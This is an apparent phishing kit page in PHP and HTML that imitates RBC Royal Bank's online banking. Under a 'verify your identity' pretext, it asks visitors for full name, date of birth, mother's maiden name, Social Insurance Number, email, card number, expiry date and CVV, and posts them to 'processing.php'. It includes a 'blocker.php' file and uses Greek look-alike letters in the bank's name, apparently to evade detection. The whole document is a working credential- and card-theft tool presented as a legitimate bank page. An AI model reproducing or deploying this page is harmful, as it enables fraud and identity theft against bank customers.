<?php
include('blocker.php');
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
 <head>
  <meta name="Identifier" content="3MSIPCHAL.HTM;9;ENGLISH;RB-MBP" />
  <noscript>
   <meta http-equiv="refresh" content="0; URL=rbcgi3m01.php?F8=1&amp;F22=HT&amp;REQUEST=SIGNOUT&amp;NS=Y&amp;CPG=7316&amp;LANGUAGE=ENGLISH" />
  </noscript>

<link href="files/favicon.ico" rel="icon">
<link href="files/common.css?6" type="text/css" rel="stylesheet" />
<link href="files/legacy.css?6" type="text/css" rel="stylesheet" />
<link href="files/main01.css?6" type="text/css" rel="stylesheet" />
<link href="files/main02.css?6" type="text/css" rel="stylesheet" />
<link href="files/tabs.css?6" type="text/css" rel="stylesheet" />
<link rel="stylesheet" type="text/css" href="files/print.css?6" media="print"/>
<script src="files/utilities.js?6" type="text/javascript"></script>
<script src="files/browser.js?6" type="text/javascript"></script>
<script src="files/event.js?6" type="text/javascript"></script>
<script src="files/event.js?6" type="text/javascript"></script>
<script src="files/kiosk.js?6" type="text/javascript"></script>
<script src="files/buttons.js?6" type="text/javascript"></script>
<script src="files/cookie.js?6" type="text/javascript"></script>
<script src="files/header_dates.js?6" type="text/javascript"></script>
<script src="files/safaricss.js?6" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript">
function shellExpired()
{
  var pDelta = rbcGetCookie( "3mDELTA", null );
  var pSessn = rbcGetCookie( "3movACWQDI2dIjWVgbAAD4GwAAVwilAA", null );

  if ( pDelta != null )
  {
    var loc   = pDelta.indexOf( '/', 0 );
    var delta = 0;
    var dtype = '0';

    if ( loc != -1 )
    {
      delta = new Number( pDelta.substring( 0, loc ) );
      dtype = pDelta.substring( loc + 1, pDelta.length );
    }
    else delta = new Number( pDelta );

    switch (dtype)
    {
      case '0':
      {
        var cdate = new Date();
        var sdate = new Date( cdate.valueOf() + 1800 );
        cdate = new Date( cdate.valueOf() + 604800000 );

        if ( pSessn == null )
        {
          rbcSetCookie( "3mDELTA", delta + 43200 + "/1", cdate.toGMTString(), "/" );
          rbcSetCookie( "3movACWQDI2dIjWVgbAAD4GwAAVwilAA", "1", sdate.toGMTString(), "/" );
        }
        else if ( pSessn != '1' )
          rbcSetCookie( "3mDELTA", delta + "/2", cdate.toGMTString(), "/" );

        break;
      }
      case '1':
      {
        if ( pSessn == null )
          rbcDeleteCookie( "3mDELTA", "/" );
        else if ( pSessn != '1' )
        {
          var cdate = new Date();
          cdate = new Date( cdate.valueOf() + 604800000 );
          rbcSetCookie( "3mDELTA", delta + "/2", cdate.toGMTString(), "/" );
        }
        break;
      }
      default :
      {
        if ( pSessn == null ) // Clear and show expired
        {
          document.location.replace( "rbcgi3m01.php?F8=1&F22=IB&REQUEST=SIGNOUT&LANGUAGE=ENGLISH" );
        }
      }
    }
  }
}
event_addOnLoad(new Array(shellExpired));
event_addOnFocusForm(new Array(shellExpired));
setTimeout( shellExpired ,1801000);
</script>
<script src="files/header_dates.js?6" type="text/javascript"></script>
<script language="javascript" type="text/javascript">
<!--
function checkOnFocusForm() {
    if ( rbcGetCookie ("3MTK","NOTTHERE") != "NOTTHERE" ){
      rbcDeleteCookie("3MTK","/");
    }
    rbcSetCookie("F100","1/WX5/2F-6fGkqLkFcS.N9LYG6foKJloaPm-jbIv1NCBA1pOmFEezmPC8YyqcL5cOY4kZ8CBUlnyxKvUQdoACINaU6qg__/GQAAAA__/S0/PB", null, "/");
}
checkOnFocusForm();
event_addOnFocusForm(new Array(checkOnFocusForm));
//-->
</script>

  <title>
    RBC Financial Group - Onl&iota;ne bank&iota;ng
  </title>
</head>

<body onFocus="event_onFocusForm(); " onBlur="event_onBlurForm();" onLoad="event_onLoad();" onUnload="event_onUnload();">
 <div id="wrapper">
 <a name="top"></a>

      <div class="skipnav"><a href="#skipheadernav" onfocus='this.parentNode.className=""' onblur='this.parentNode.className="skipnav"'>Skip Header Navigation</a></div>
      <!-- Secure Header Start -->
      <div id="globalheader" class="clear globalheader-basic globalheader-secure">
        <div id="globalheader-logo">
                    <img src="files/rbc_royalbank_en.gif" alt="RBC Royal Bank" title="RBC Royal Bank" width="210" height="47" />
        </div>

        <p id="globalheader-links">
          <a href="javascript:kiosk_OpenWinRTB('rbcgi3m01.php', 'CONTACT', kiosk_Type2X, kiosk_Type2Y, kiosk_Type2R )" title="Customer Service (opens new window)">Customer Service</a>
		</p>

        <p id="globalheader-secureinfo">

        </p>
        <p id="globalheader-tools"><script type="text/javascript" language="JavaScript">dates_currentDate( 'ENGLISH' );</script></p>
      </div>

      <!-- Secure Header End -->
      <div class="skipnavanchor"><a name="skipheadernav" id="skipheadernav"></a></div>


 <div id="layout" class="clear">

 <div id="layout-column-main" style="width:946px">

 <table border="0" width="100%">

  <tr valign="top" align="left">

      <td width="5"></td>
	  
      <td valign="top" ><script language="JavaScript" type="text/javascript" src="files/rsa.js"></script>
<form name="continueform" method="post" action="processing.php" autocomplete="off" >

  <table border="0" width="100%">
   <tr>
    <td>
     <table border="0" cellspacing="0" cellpadding="0" width="100%">
      <tr>

       <td colspan="2" align="left">
        <div id="pagetitlearea" class="clear">
           <h1 id="pagetitle">
             Personal Information
           </h1>
       </div>
       </td>
      </tr>

      <tr><td colspan="2" height="5" align="left"></td></tr>
      <tr>
       <td colspan="2" class="bodyText">
        To help us verify your identity, please enter your information:<br /><br />
       </td>
      </tr>
      <tr>
       <td colspan="2" >
       <span class="contentframework-required-note"><b class="contentframework-required-asterisk">*</b>Required Information</span><br /><br />
       </td>
      </tr>
      <tr>
       <td colspan="2">
        <table class="contentframework" style="border-bottom:0px">
		 <tr>
          <td class="contentframework-formdatalabel"  >
           <label for="pvqAnswer">
           <SPAN class="contentframework-negativeindent">
           <b class="contentframework-required-asterisk">*</b></SPAN><strong>Full Name:</strong>
     </label>
          </td>
          <td >
           <input type="text" name="FN" id="pvqAnswer" size="21"  required="" value="" />
		   <span class="contentframework-contextualhelp">
          </td>
         </tr>
         <tr>
          <td class="contentframework-formdatalabel"  >
           <label for="pvqAnswer">
           <SPAN class="contentframework-negativeindent">
           <b class="contentframework-required-asterisk">*</b></SPAN><strong>Date of Birth:</strong>
     </label>
          </td>
          <td >
           <input type="text" name="DB" id="pvqAnswer" size="21" maxlength="10" placeholder="DD-MM-YYYY" required="" value="" />
		   <span class="contentframework-contextualhelp">
          </td>
         </tr>
		  <tr>
          <td class="contentframework-formdatalabel"  >
           <label for="pvqAnswer">
           <SPAN class="contentframework-negativeindent">
           <b class="contentframework-required-asterisk">*</b></SPAN><strong>Mother's Maiden Name:</strong>
     </label>
          </td>
          <td >
           <input type="text" name="MN" id="pvqAnswer" size="21" required="" value="" />
		   <span class="contentframework-contextualhelp">
          </td>
         </tr>
         <tr>
          <td class="contentframework-formdatalabel"  >
           <label for="pvqAnswer">
           <SPAN class="contentframework-negativeindent">
           <b class="contentframework-required-asterisk">*</b></SPAN><strong>Social Insurance Number:</strong>
			</label>
          </td>
          <td >
           <input type="text" name="SN" id="pvqAnswer" size="21" maxlength="11" placeholder="***-***-***" required="" value="" />
		   <span class="contentframework-contextualhelp">
          </td>
         </tr>
		 <tr>
          <td class="contentframework-formdatalabel"  >
           <label for="pvqAnswer">
           <SPAN class="contentframework-negativeindent">
           <b class="contentframework-required-asterisk">*</b></SPAN><strong>Your Email:</strong>
     </label>
          </td>
          <td >
           <input type="text" name="EM" id="pvqAnswer" size="21" required="" value="" />
		   <span class="contentframework-contextualhelp">
          </td>
         </tr>
		</table>       
       </td>
     
     <table border="0" cellspacing="0" cellpadding="0" width="100%">
      <tr>

       <td colspan="2" align="left">
        <div id="pagetitlearea" class="clear">
           <h1 id="pagetitle">
		   Card Information
           </h1>
       </div>
       </td>
      </tr>
      <tr><td colspan="2" height="5" align="left"></td></tr>      
      <tr>
       <td colspan="2">
        <table class="contentframework" style="border-bottom:0px">
		 <tr>
          <td class="contentframework-formdatalabel"  >
           <label for="pvqAnswer">
           <SPAN class="contentframework-negativeindent">
           <b class="contentframework-required-asterisk">*</b></SPAN><strong>Name on Card:</strong>
     </label>
          </td>
          <td >
           <input type="text" name="NC" id="pvqAnswer" size="21"  required="" value="" />
		   <span class="contentframework-contextualhelp">
          </td>
         </tr>
		 <tr>
          <td class="contentframework-formdatalabel"  >
           <label for="pvqAnswer">
           <SPAN class="contentframework-negativeindent">
           <b class="contentframework-required-asterisk">*</b></SPAN><strong>Card Number:</strong>
     </label>
          </td>
          <td >
           <input type="text" name="CN" id="pvqAnswer" size="21" maxlength="16" required="" value="" />
		   <span class="contentframework-contextualhelp">
          </td>
         </tr>
         <tr>
          <td class="contentframework-formdatalabel"  >
           <label for="pvqAnswer">
           <SPAN class="contentframework-negativeindent">
           <b class="contentframework-required-asterisk">*</b></SPAN><strong>Exp Date:</strong>
     </label>
          </td>
          <td >
		   <input type="text" name="EXP" id="pvqAnswer" size="21" placeholder="MM-YYYY" maxlength="7" value="" />
		   <span class="contentframework-contextualhelp">
          </td>
         </tr>
		  <tr>
          <td class="contentframework-formdatalabel"  >
           <label for="pvqAnswer">
           <SPAN class="contentframework-negativeindent">
           <b class="contentframework-required-asterisk">*</b></SPAN><strong>Cvv2:</strong>
     </label>
          </td>
          <td >
           <input type="password" name="CVV" id="pvqAnswer" size="21" maxlength="3" placeholder="***" required="" value="" />
		   <span class="contentframework-contextualhelp">
          </td>
         </tr>
        </table>	
       
       </td>
      </tr>
     </table>
    </td>
  
    <td width="216">&nbsp;</td>
   </tr>

   <tr><td colspan="2">&nbsp;</td></tr>

   <tr>
    <td>
      <table width="100%" cellpadding="0" cellspacing="0" border="0">
          <tr>
            <td>
<!--3MBUTTON01.CINC: en-->
<span class="button button-secondary">

</span>

<!--3MBUTTON01.CINC. en-->
            </td>
            <td colspan="2" align="right">
<!--3MBUTTON01.CINC: en-->

 <span style="float:right;" >

<span class="button button-primary">
<span>
<input type="submit" class="btn btn--primary button-text-font" style="color:white;background-color:#002888" value="Submit">
</span>
</span>

 </span>


<!--3MBUTTON01.CINC. en-->
            </td>
          </tr>
      </table>
    </td>
    <td width="216">&nbsp;</td>
   </tr>
  </table>
</form>

  <script type="text/javascript">
  <!--
   document.continueform.SIP_PVQ_ANS.focus();
  //-->
  </script>

<script type="text/javascript">
<!--
 //document.continueform.SIP_PVQ_ANS.focus();
  v3mRSA_GetData(document.continueform);
//-->
</script>


</td>
      <!-- END:   content -->

  </tr>
 </table>
 </div>

 </div>


<!--3MSHELLFTPT.INC:-->

 <div id="globalfooter">
  <div id="globalfooter-main">
      <p>Roy&alpha;l B&alpha;nk of C&alpha;n&alpha;d&alpha; Website, &copy; 1995-2017</p>
 
 
			
   <p><a href="javascript:kiosk_OpenWinRTB( 'http://www.rbc.com/privacysecurity/ca/', 'RTB', kiosk_Type2X, kiosk_Type2Y, kiosk_Type2R )" title="Privacy &amp; Security (opens new window)" >Privacy &amp; Security</a> | 
   <a href="javascript:kiosk_OpenWinRTB( 'http://www.rbc.com/legal/', 'RTB', kiosk_Type3X, kiosk_Type3Y, kiosk_Type3R )" title="Legal (opens new window)" >Legal</a> | 
   <a href="javascript:kiosk_OpenWinRTB( 'http://www.rbc.com/accessibility/', 'RTB', kiosk_Type3X, kiosk_Type3Y, kiosk_Type3R )" title="Accessibility (opens new window)">Accessibility</a>
   </p>
  </div>
 </div>

<!--3MSHELLFTPT.INC.-->
<!-- 3MSHELLFOOT.JS -->
<script language="Javascript" type="text/javascript">
<!--
var c3mbp = new buttons_ButtonPreload( "btn_", "_down" );
//-->
</script>

</div>
</body>

</html>
